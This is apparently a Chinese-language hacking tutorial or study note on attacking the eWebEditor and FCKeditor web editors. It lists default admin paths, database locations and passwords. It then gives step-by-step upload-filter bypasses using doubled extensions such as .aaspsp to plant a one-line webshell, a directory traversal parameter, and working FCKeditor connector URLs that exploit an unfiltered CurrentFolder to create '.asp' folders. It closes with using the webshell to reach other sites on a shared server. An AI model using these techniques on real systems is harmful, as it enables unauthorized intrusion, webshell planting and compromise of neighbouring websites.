编辑器漏洞

Ewebeditor编辑器:

Ewebeditor利用核心


默认后台:www.xxxx.com/ewebeditor/admin_login.asp

默认数据库:ewebeditor/db/ewebeditor.mdb

默认账号密码:admin admin/admin888

通常入侵ewebeditor编辑器的步骤如下:

首先登陆默认后台。(使用默认账号密码登录。也可用默认数据库下载数据库)

登陆后台以后。选择样式管理,默认编辑器的默认样式都不可以修改的。我们可以从任意样式新建一个样式,然后在图片上传添加可上传后缀。.asa .cer .cdx等!.asp 过滤过了。但是我们可以用.aaspsp后缀来添加,这样上传文件正好被ewebeditor 吃掉asp后缀,剩下.asp 。同样,如果遇到一个管理员有安全意识的,从代码里,把.asp .asa .cer .cdx 都完全禁止了,我们也可以用.asasaa 后缀来突破。添加完了后缀,可以在样式管理,点击预览,然后上传!

在图片类型中加入以下类型:asa|cer|asp|aaspsp。 然后选择提交。

选择工具栏。

点击新增工具栏。在按钮设置里新增"插入或修改图片"

多加一些功能也无所谓。

然后点击保存设置。然后再回去点击预览。

控件效果就出来了。然后直接上传一句话木马。

(ps:预览里的功能点啥都没反应,是因为浏览器版本太高啦,换个低版本就可奥)

上传一句话木马。

连上一句话木马的地址,输入木马里的密码就可以啦。

进去啦,想干点啥就干点啥吧。

目录遍历漏洞利用:

在文件上传管理,随便选一个样式目录。在id=27后面加上&dir=../  就可以目录遍历啦。

发现没有起作用,那就是2.1.6这个版本不存在这个漏洞。换成2.8.0。2.8.0存在这个漏洞

Fck编辑器:

3.常用上传地址

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

由于这里用的是2.5的版本所以下面这条语句能用

http://192.168.87.129:8234//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp(默认路径一般不会改可以看看/editor/这里有没有二级路径有的话要加上啊)

通过各种绕过上传的方法会发现都把点过滤为了_。

执行以下地址就能成功创建文件夹

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo111.asp&NewFolderName=xx.asp

这又是为什么了????手动不能创建,而通过以上地址就能成功创建了,让我们来对比下,手动创建和通过以上地址创建的一个区别。

漏洞地址:

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendooooo.asp&NewFolderName=x.asp

手工新建:

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=fendo.asp

原因:

CurrentFolder:当前文件夹 未进行过滤(这个文件夹下的没有过滤)

NewFolderName:新建文件名 进行了过滤

这就是为什么通过上面地址能创建,而手动却不能创建的一个原因,然后我们再上传6.asp;.jpg到fendo.asp文件下看是否成功解析。

再回到创建目录的页面,在fendo.asp里上传1.png  再用菜刀连接件就行。 通用型漏洞所以这是通用型地址。

目录越权:通过当前网站访问另一个网站。

(自己理解:一个服务器有很多网站,一个有漏洞,通过这个漏洞拿到webshell,可以访问其他网站,也可以吧所有网站打包下载下来)(每个网站给一个账号)

先上传木马,

然后进入木马。可以看到所有在这个服务器的网站都可以攻击,这就是目录越权。

任何绕过目录越权,首先要建一个账号。在我的电脑管理里边。新建一个用户。

给凡诺这个网站添加test1这个用户。

你可能感兴趣的:(编辑器漏洞)